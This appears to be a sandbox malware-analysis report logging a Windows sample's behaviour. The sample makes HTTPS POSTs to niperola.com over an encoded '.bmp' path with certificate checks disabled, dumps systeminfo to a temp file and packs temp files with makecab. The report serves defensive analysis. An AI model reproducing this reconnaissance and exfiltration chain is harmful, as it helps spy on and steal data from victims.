Open Session user_agent = Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64), access_type = INTERNET_OPEN_TYPE_PRECONFIG, flags = INTERNET_FLAG_ASYNC True 1
Fn
Open Connection protocol = HTTP, server_name = niperola.com, server_port = 443 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp, accept_types = 0, flags = INTERNET_FLAG_CACHE_ASYNC, INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Content-Type: multipart/form-data; boundary=--------------------------1152aa61152aa61152aa6 True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = niperola.com/images/Sdr0veeuxIs423cs/Tnd8mVY43F4Qywc/WFq_2BFq4udNXnLEI2/5yYbo8vUX/ULdIWHIiDOgCDHKlSdf3/B7HpHHGg3GOf8WqKrA6/TIQoZxKGHkt3LMqIHtwgl_/2BMJVT34_2F7R/orrQrI0V/AN4ZHJmhdykJRQp3JPz37jX/OoN9d1bleg/mH9QzEoevwxCrl6nn/Hi6TCdygympm/FY8i_2Fz1zb/uDNd_2Bho/8_2B.bmp False 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Close Session - True 2
Fn
Process #13: cmd.exe
64 0
»
Information Value
ID #13
File Name c:\windows\system32\cmd.exe
Command Line cmd /C "systeminfo.exe > C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:10, Reason: Child Process
Unmonitor End Time: 00:04:24, Reason: Self Terminated
Monitor Duration 00:00:14
OS Process Information
»
Information Value
PID 0xbf0
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9C4
0x BD4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x0000004a21dc0000 0x4a21dc0000 0x4a21ddffff Private Memory rw True False False -
pagefile_0x0000004a21dc0000 0x4a21dc0000 0x4a21dcffff Pagefile Backed Memory rw True False False -
private_0x0000004a21dd0000 0x4a21dd0000 0x4a21dd6fff Private Memory rw True False False -
pagefile_0x0000004a21de0000 0x4a21de0000 0x4a21df3fff Pagefile Backed Memory r True False False -
private_0x0000004a21e00000 0x4a21e00000 0x4a21efffff Private Memory rw True False False -
pagefile_0x0000004a21f00000 0x4a21f00000 0x4a21f03fff Pagefile Backed Memory r True False False -
pagefile_0x0000004a21f10000 0x4a21f10000 0x4a21f10fff Pagefile Backed Memory r True False False -
private_0x0000004a21f20000 0x4a21f20000 0x4a21f21fff Private Memory rw True False False -
locale.nls 0x4a21f30000 0x4a21fedfff Memory Mapped File r False False False -
private_0x0000004a21ff0000 0x4a21ff0000 0x4a21ff6fff Private Memory rw True False False -
private_0x0000004a22000000 0x4a22000000 0x4a220fffff Private Memory rw True False False -
private_0x0000004a22100000 0x4a22100000 0x4a221fffff Private Memory rw True False False -
private_0x0000004a22220000 0x4a22220000 0x4a2222ffff Private Memory rw True False False -
sortdefault.nls 0x4a22230000 0x4a22566fff Memory Mapped File r False False False -
pagefile_0x00007df5ff210000 0x7df5ff210000 0x7ff5ff20ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff60caa0000 0x7ff60caa0000 0x7ff60cb9ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff60cba0000 0x7ff60cba0000 0x7ff60cbc2fff Pagefile Backed Memory r True False False -
private_0x00007ff60cbcb000 0x7ff60cbcb000 0x7ff60cbccfff Private Memory rw True False False -
private_0x00007ff60cbcd000 0x7ff60cbcd000 0x7ff60cbcdfff Private Memory rw True False False -
private_0x00007ff60cbce000 0x7ff60cbce000 0x7ff60cbcffff Private Memory rw True False False -
cmd.exe 0x7ff60d9c0000 0x7ff60da18fff Memory Mapped File rwx True False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 2.18 KB MD5: a6df774d816b209411b2333a5b9ec424
SHA1: 51fff99e39c47cfec686851612a455f379bb2aad
SHA256: f2014faf873ca57b633b8fa4ca50b8e43ceb9a702d22d1c64c0e77b3adaed138
SSDeep: 48:wtjQxD3CK4PCX1iUkkJGK/JIj3fG7XhygKYhkTNY/uEMcCGEi6wM8w0:wtjQxDyVCX1TvQ3EKYeTTOEi6H8w0 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 2.10 KB MD5: 509553efe36a0a3e6d316481927a6140
SHA1: ed902b212b4fbd216da77d029b470c3f4e9b6792
SHA256: f1c8d9f360fcd68ee7457dcba1138f72958bf67d04eacbea9ff19709dd0415d9
SSDeep: 48:wtjQxD3CK4PCX1iUkkJGK/JIj3fG7XhygKYhkTNY/uEMcCGEi6wMw:wtjQxDyVCX1TvQ3EKYeTTOEi6Hw 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 2.07 KB MD5: c46a15454bdd7e5e261bd0233d5f4292
SHA1: 1991f9352757223744120ce3ff58a2b4d8f74084
SHA256: de78c3da8402e55106baea673ecd23bd774f9c32ba553dd19876edd512fe213a
SSDeep: 48:wtjQxD3CK4PCX1iUkkJGK/JIj3fG7XhygKYhkTNY/uEMcCGEi6wM2:wtjQxDyVCX1TvQ3EKYeTTOEi6H2 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 2.08 KB MD5: 341fcd9604b64893ae0005256b5ce72b
SHA1: 2b009bf647e0e2647dfeeea2ef9a835488f90592
SHA256: 51107a8da1ccf7d83630c641ce38123bc78289e8f4c2b7c6d0b2afc8092bb4d7
SSDeep: 48:wtjQxD3CK4PCX1iUkkJGK/JIj3fG7XhygKYhkTNY/uEMcCGEi6wMT:wtjQxDyVCX1TvQ3EKYeTTOEi6HT 		False
...
Host Behavior
File (17)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1 desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info systeminfo.exe type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 9
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\systeminfo.exe os_pid = 0xbd0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff60d9c0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ff977acd550 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ff977ad25e0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ff977ad1f90 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ff975423a10 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #15: makecab.exe
70 0
»
Information Value
ID #15
File Name c:\windows\system32\makecab.exe
Command Line makecab.exe /F "C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin"
Initial Working Directory C:\Users\CIIHMN~1\AppData\Roaming\MICROS~1\{25E2F~1\
Monitor Start Time: 00:04:12, Reason: Child Process
Unmonitor End Time: 00:04:17, Reason: Self Terminated
Monitor Duration 00:00:05
OS Process Information
»
Information Value
PID 0x200
Parent PID 0x834 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 20C
0x BD8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x00000027e8740000 0x27e8740000 0x27e875ffff Private Memory rw True False False -
pagefile_0x00000027e8740000 0x27e8740000 0x27e874ffff Pagefile Backed Memory rw True False False -
private_0x00000027e8750000 0x27e8750000 0x27e8756fff Private Memory rw True False False -
pagefile_0x00000027e8760000 0x27e8760000 0x27e8773fff Pagefile Backed Memory r True False False -
private_0x00000027e8780000 0x27e8780000 0x27e87fffff Private Memory rw True False False -
pagefile_0x00000027e8800000 0x27e8800000 0x27e8803fff Pagefile Backed Memory r True False False -
pagefile_0x00000027e8810000 0x27e8810000 0x27e8811fff Pagefile Backed Memory r True False False -
private_0x00000027e8820000 0x27e8820000 0x27e8821fff Private Memory rw True False False -
private_0x00000027e8830000 0x27e8830000 0x27e8836fff Private Memory rw True False False -
private_0x00000027e8840000 0x27e8840000 0x27e8840fff Private Memory rw True False False -
private_0x00000027e8850000 0x27e8850000 0x27e8850fff Private Memory rw True False False -
private_0x00000027e8860000 0x27e8860000 0x27e895ffff Private Memory rw True False False -
locale.nls 0x27e8960000 0x27e8a1dfff Memory Mapped File r False False False -
private_0x00000027e8a20000 0x27e8a20000 0x27e8a9ffff Private Memory rw True False False -
tzres.dll 0x27e8aa0000 0x27e8aa2fff Memory Mapped File r False False False -
private_0x00000027e8aa0000 0x27e8aa0000 0x27e8b9ffff Private Memory rw True False False -
tzres.dll.mui 0x27e8ab0000 0x27e8ab8fff Memory Mapped File r False False False -
private_0x00000027e8c10000 0x27e8c10000 0x27e8c1ffff Private Memory rw True False False -
pagefile_0x00000027e8c20000 0x27e8c20000 0x27e8da7fff Pagefile Backed Memory r True False False -
pagefile_0x00000027e8db0000 0x27e8db0000 0x27e8f30fff Pagefile Backed Memory r True False False -
pagefile_0x00000027e8f40000 0x27e8f40000 0x27ea33ffff Pagefile Backed Memory r True False False -
pagefile_0x00007df5ffac0000 0x7df5ffac0000 0x7ff5ffabffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff6a2b50000 0x7ff6a2b50000 0x7ff6a2c4ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff6a2c50000 0x7ff6a2c50000 0x7ff6a2c72fff Pagefile Backed Memory r True False False -
private_0x00007ff6a2c79000 0x7ff6a2c79000 0x7ff6a2c79fff Private Memory rw True False False -
private_0x00007ff6a2c7c000 0x7ff6a2c7c000 0x7ff6a2c7dfff Private Memory rw True False False -
private_0x00007ff6a2c7e000 0x7ff6a2c7e000 0x7ff6a2c7ffff Private Memory rw True False False -
makecab.exe 0x7ff6a3bf0000 0x7ff6a3c09fff Memory Mapped File rwx True False False -
version.dll 0x7ff96c360000 0x7ff96c369fff Memory Mapped File rwx False False False -
cabinet.dll 0x7ff96dd40000 0x7ff96dd66fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
user32.dll 0x7ff9757b0000 0x7ff9758fdfff Memory Mapped File rwx False False False -
msctf.dll 0x7ff977200000 0x7ff97735bfff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
gdi32.dll 0x7ff9774c0000 0x7ff977644fff Memory Mapped File rwx False False False -
imm32.dll 0x7ff977720000 0x7ff977755fff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
setup.inf 0.93 KB MD5: b19102f1fce46e8be9ee9b154917a7a4
SHA1: fc7190a4a81ea424ac85b37774a30e2f2d5fa233
SHA256: 14285549114d443547dcdc8b136bdb5b334841d887c34aff6cc8881fe217614a
SSDeep: 12:QxncDimwRgSqnsP2neJhe5CbkIncDimwRgSqnhIv:QF8vwAn02nKheYbt8vwAnw 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_6 0.03 KB MD5: 2a6e424d0341f1e9525fbe2fdc03c286
SHA1: 69e1ad0e32574aea0ff284091e6c00252ae6295c
SHA256: 6965f7cc58394ae528c6ff61cc1684662a1ae2851de0136d46b6ca428fefa072
SSDeep: 3:avIcn:M 		False
...
setup.rpt 0.28 KB MD5: 4ed0cf5d46e3db4ece309ebe24f0b967
SHA1: bf437a96bfd320e1ee6b6cda344a4755a90c114d
SHA256: a23d358cf86601d79d0155f9bb65e2e261836dc70a7327f0dc75ef58ab5fa210
SSDeep: 6:vKfSUVUql/ukwT2SVKQv7D0iwj/b+xQTU3a:vKfSwXwbBv7Aiwj65a 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep: 3:: 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_9 0.01 KB MD5: 7b5b6c7bf41e6055abd4e74476e08575
SHA1: 5c05d3a68f69258d236f6d9677cc0a42e399e7cc
SHA256: 2392619f397925a165cf31634781d68b006c396611c425f6c67f338356e47f8f
SSDeep: 3:P:P 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_4 0.04 KB MD5: d7a4470b27cf1de1786ad19b81eefbe4
SHA1: 3f68784ab4bfb74f700d41422b70dd98eb77df61
SHA256: 858b92ad56d79074ce2e9197af354fe79981fcccdeba6c2f00d59a221206597a
SSDeep: 3:dJgVRl+yQTIpkvn:dq5+Xvn 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_3 0.03 KB MD5: 1d8f07dabb819941cdabadab2f5afc09
SHA1: cd2108ad525e111702318ebec8f041abe0d2058d
SHA256: 3b89cf396559512c59e50a34fe7ee12e50ae3cc5b0ba5e56133b97adde288b64
SSDeep: 3:NLBoGURzzv:ZeGgzv 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_2 0.02 KB MD5: 4230347e5849e9c7230227a287ae4a41
SHA1: a3fa042694dc86f05973ac07231c95cf590d606a
SHA256: 2484fa669042204d83d907de45012a2aef7f6687613ce76169097240415b0abd
SSDeep: 3:R0qxv:Rf 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_5 0.08 KB MD5: 9b7c67062c98970fbeee70e704792806
SHA1: b3cc082505413056d39b66e9ac049956e8fe8f63
SHA256: 6b656634aeac7fd407ef0ef095563851a41af0b0ed7d74250eafb29c04f8205b
SSDeep: 3:3lZjQyiv2PuIX3Nv3BBNDKcwASzGEsKn:rQyivzIX9v33AczAGEn 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin 0.16 KB MD5: 5d4eabe56040cf50fc08338ee35fe0f8
SHA1: 1ec80404152e299bd532f1b9312faf4ddf8de871
SHA256: ab3a62ca282e1311ee084d4ccc0475f4666e9ef5ac1eec2ba1bfe284e198170b
SSDeep: 3:wkltLl5/GmGl+lElqvIc0lQyiv2PuIX3Nv3BBNDKcwASzGEsKn:wsFGmy+aHlQyivzIX9v33AczAGEn 		False
...
C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_7 0.08 KB MD5: d1590e9fff9f288b89f78982a6ec02f1
SHA1: 4d8eb883e0994623bfb4d7eaf2b5717e92efb7db
SHA256: d1b27b955b4ee705abdd8135d563f940f39766ff12237b08fde323a8c75a10eb
SSDeep: 3:0lQyiv2PuIX3Nv3BBNDKcwASzGEsKn:0lQyivzIX9v33AczAGEn 		False
...
Host Behavior
File (66)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin file_attributes = _O_EXCL True 1
Fn
Create CAB00512.TMP file_attributes = _O_RDWR, _O_CREAT, _O_EXCL True 2
Fn
Create setup.inf file_attributes = _O_RDWR, _O_CREAT True 1
Fn
Create setup.rpt file_attributes = _O_RDWR, _O_CREAT True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_2 file_attributes = _O_WRONLY True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_3 file_attributes = _O_WRONLY True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_4 file_attributes = _O_WRONLY True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin file_attributes = _O_EXCL True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP file_attributes = _O_RDWR, _O_CREAT, _O_EXCL True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_5 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_6 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_7 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_8 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_9 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Fn
Create 01D4756785E0F97F09 desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_DELETE True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_10 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_11 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_12 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_13 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\cab_512_14 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_DELETE True 1
Fn
Create setup.inf file_attributes = _O_WRONLY | _O_BINARY True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_2 file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_3 file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Create C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_4 file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Create setup.rpt file_attributes = _O_WRONLY True 1
Fn
Get Info 01D4756785E0F97F09 type = file_attributes True 1
Fn
Read C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin size = 3 True 1
Fn
Data
Read C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin size = 4096 True 1
Fn
Data
Read C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin size = 3 True 1
Fn
Data
Read C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin size = 4096 True 1
Fn
Data
Read - size = 32768 True 3
Fn
Data
Read - size = 32672 False 1
Fn
Read C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 8 True 1
Fn
Data
Read C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 74 True 1
Fn
Data
Read C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 8 False 1
Fn
Read - size = 16 True 1
Fn
Data
Read - size = 256 True 1
Fn
Data
Read - size = 16 False 1
Fn
Read - size = 8 True 1
Fn
Data
Read - size = 8 False 1
Fn
Read - size = 32768 False 2
Fn
Read C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_2 size = 2048, size_out = 23 True 1
Fn
Data
Read C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_3 size = 2048, size_out = 30 True 1
Fn
Data
Read C:\Users\CIIHMN~1\AppData\Local\Temp\inf_512_4 size = 2048, size_out = 40 True 1
Fn
Data
Write - size = 16 True 2
Fn
Data
Write - size = 19 True 2
Fn
Data
Write C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 8 True 2
Fn
Data
Write C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 74 True 1
Fn
Data
Write - size = 8 True 2
Fn
Data
Write - size = 74 True 1
Fn
Data
Write C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 36 True 1
Fn
Data
Write C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 35 True 1
Fn
Data
Write C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 82 True 1
Fn
Data
Write C:\Users\CIIHMN~1\AppData\Local\Temp\CAB00512.TMP size = 4 True 1
Fn
Data
Write setup.inf size = 23 True 1
Fn
Data
Write setup.inf size = 30 True 1
Fn
Data
Write setup.inf size = 40 True 1
Fn
Data
Module (3)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\makecab.exe base_address = 0x7ff6a3bf0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7ff977ad0f40 True 1
Fn
System (1)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 1
Fn
Process #17: systeminfo.exe
0 0
»
Information Value
ID #17
File Name c:\windows\system32\systeminfo.exe
Command Line systeminfo.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:14, Reason: Child Process
Unmonitor End Time: 00:04:24, Reason: Self Terminated
Monitor Duration 00:00:10
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xbd0
Parent PID 0xbf0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BBC
0x BAC
0x 2EC
0x 2E8
0x 4B0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x0000005eafe40000 0x5eafe40000 0x5eafe5ffff Private Memory rw True False False -
pagefile_0x0000005eafe40000 0x5eafe40000 0x5eafe4ffff Pagefile Backed Memory rw True False False -
private_0x0000005eafe50000 0x5eafe50000 0x5eafe56fff Private Memory rw True False False -
pagefile_0x0000005eafe60000 0x5eafe60000 0x5eafe73fff Pagefile Backed Memory r True False False -
private_0x0000005eafe80000 0x5eafe80000 0x5eafefffff Private Memory rw True False False -
pagefile_0x0000005eaff00000 0x5eaff00000 0x5eaff03fff Pagefile Backed Memory r True False False -
pagefile_0x0000005eaff10000 0x5eaff10000 0x5eaff10fff Pagefile Backed Memory r True False False -
private_0x0000005eaff20000 0x5eaff20000 0x5eaff21fff Private Memory rw True False False -
private_0x0000005eaff30000 0x5eaff30000 0x5eaffaffff Private Memory rw True False False -
private_0x0000005eaffb0000 0x5eaffb0000 0x5eaffb6fff Private Memory rw True False False -
systeminfo.exe.mui 0x5eaffc0000 0x5eaffc3fff Memory Mapped File r False False False -
private_0x0000005eaffd0000 0x5eaffd0000 0x5eaffd0fff Private Memory rw True False False -
private_0x0000005eaffe0000 0x5eaffe0000 0x5eb00dffff Private Memory rw True False False -
locale.nls 0x5eb00e0000 0x5eb019dfff Memory Mapped File r False False False -
private_0x0000005eb01a0000 0x5eb01a0000 0x5eb01a0fff Private Memory rw True False False -
pagefile_0x0000005eb01b0000 0x5eb01b0000 0x5eb01b0fff Pagefile Backed Memory r True False False -
